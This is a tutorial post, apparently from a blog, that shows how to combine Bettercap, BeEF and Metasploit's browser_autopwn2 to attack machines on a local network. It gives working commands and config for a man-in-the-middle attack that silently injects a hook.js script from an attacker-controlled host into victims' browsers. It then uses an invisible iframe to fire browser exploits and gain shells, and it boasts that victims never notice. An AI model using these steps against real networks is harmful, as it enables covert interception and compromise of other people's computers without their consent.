This tutorial assumes that you already know your way around the basics of metasploit, bettercap and beef.
Versions used:
– Bettercap v1.5.8
– Metasploit msfconsole 4.12.41-dev
– BeeF 0.4.7.0-alpha
Objective:
The objective is to create a hook.js address in beef and inject it in any machine inside your LAN without the victim knowing or having to interact with it. Also if by any chance their browser is exploitable you can get a shell using it in conjunction with metasploit’s browser_autopwn2. If you need the newest BeeF version you can clone its git form Master in a new folder and install it there. It won’t intrude with your previous version.
Tests concluded:
– Attacker’s machine: Kali 2
– Tested successfully in Victim’s machines:
OS: Windows XP SP2, XP SP3, 2012 Server, Win7, Win8, Win8.1, Win10 and OSX
Browser: different versions of Safari, Firefox, Chrome and IE
BeeF prep:
First you have to enable metasploit extensions. In BeeF folder go to extensions/metasploit/config.yaml and set:
enable: true host: ATTACKER-IP callback_host: ATTACKER-IP
Then close it and create a file in any folder where you will be playing from. Personally I have a folder created in the same beef location to load my stuff. The file can be called anything you want, I’ll call it beef_to_msf_load. Inside it you will have to provide some parameters as they were in your extensions/metasploit/config.yaml from before. So mine contains the following info:
load msgrpc ServerHost:ATTACKER-IP User=msf Pass=abc123 SSL=y
It goes without saying but when it says ATTACKER-IP it has to be substituted with your Kali/Backbox/Attacker-OS IP address.
Steps:
$ msfconsole -r beef_to_msf_load
You’ll have to get something similar to this:
[*] Processing loadmsfparams for ERB directives. resource (loadmsfparams)> load msgrpc ServerHost:ATTACKER-IP User=msf Pass=abc123 SSL=y [*] MSGRPC Service: ATTACKER-IP:55552 (SSL) [*] MSGRPC Username: msf [*] MSGRPC Password: abc123 [*] Successfully loaded plugin: msgrpc
Load browser_autopown2:
msf> use auxiliary/server/browser_autopwn2
Open another terminal and open BeeF
$ ruby beef or $ ./beef
Just load BeeF normally. You can clean previous cache, if its interfering, by attaching a -x to it so it will be a clean load. You will have to get something similar to this:
[*] Project Creator: Wade Alcorn (@WadeAlcorn) [*] Connecting to Metasploit on ATTACKER-IP:55552 [*] Successful connection with Metasploit. [*] Loaded 295 Metasploit exploits. [*] Resetting the database for BeEF. [*] BeEF is loading. Wait a few seconds... [*] 13 extensions enabled. [*] 572 modules enabled.
Open another termial for bettercap:
$ bettercap -T TARGET-IP --proxy-module injectjs --js-url "http://ATTACKER-IP:3000/hook.js"
This will sniff the target’s data and start injecting in their browsering that hook.js of us without the victim noticing. So you don’t need any Social Engineering for them to use that link, you’ll be forcing the victim’s browser to silently use your hook.js URL. It works wonderfully you’ll see it appear in your BeeF panel sooner or later.
Optional – Metasploit:
You can load the newest version of browser_autopwn called just browser_autopwn2 like we specified before:
msf> use auxiliary/server/browser_autopwn2
Set the appropriate fields which is pretty straight forward and launch it. You will be launching a good bunch of exploits sorted by metasploit by effectiveness.
msf> use -z
This will give you another URL that the user has to browse to trigger the exploits. Do we need to disconnect bettercap and reconnect using techniques such as dns spoofing? Not at all! We already have BeeF to do that for us. So go to your target in BeeF panel and open
Commands > Misc > Create invisible Iframe
This is pure magic use that to force the already owned browser read that new URL your metasploit bulk of exploits just created and you will see it triggered. The victim will never know. What can happen through is that the target’s browser shows a confirmation to the user depending on the exploit used (js, adobe, etc.), browser used and version, OS, etc.
0 Comments